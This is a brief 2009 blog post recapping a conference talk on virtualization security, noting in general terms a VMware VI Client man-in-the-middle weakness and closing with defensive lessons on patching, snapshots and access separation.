Thursday, 19 November 2009

Claudio Criscione - Virtualization security

Claudio gave today brilliant presentation about virtualization security... Just a few bullet points from the presentation.

  • It turned out that VMWare hypervisor is running Tomcat to give you the admin interface - oldie (shall I read it 'unpatched') but goldie, right?
  • You can do MiTM against VMWare VI Client... and as presented at the demo, that works like a charm, plus...
  • ... if you can MiTM you can pwn the box - clients.xml that is served by the server contains a URL of the client .exe to be executed - boom, you can change that!
Just to give you the idea - during live demo Claudio forced the admin PC (the one running VI Client) to format drive C: and there was no option to stop it, it pretty much kicked off right away.

There was much more than that - also Xen and Ubuntu got their share here but the practical demo was based on VMWare.

Lessons learned?
Treat VM hosts and their apps just as another computer, another system and make sure you secure them the same way as any other system. Think of patch management and what happens when you revert to a snapshot (it may be old and unpatched so you bring back unpatched or already compromised system), think of separation of duties and access (physical and logical).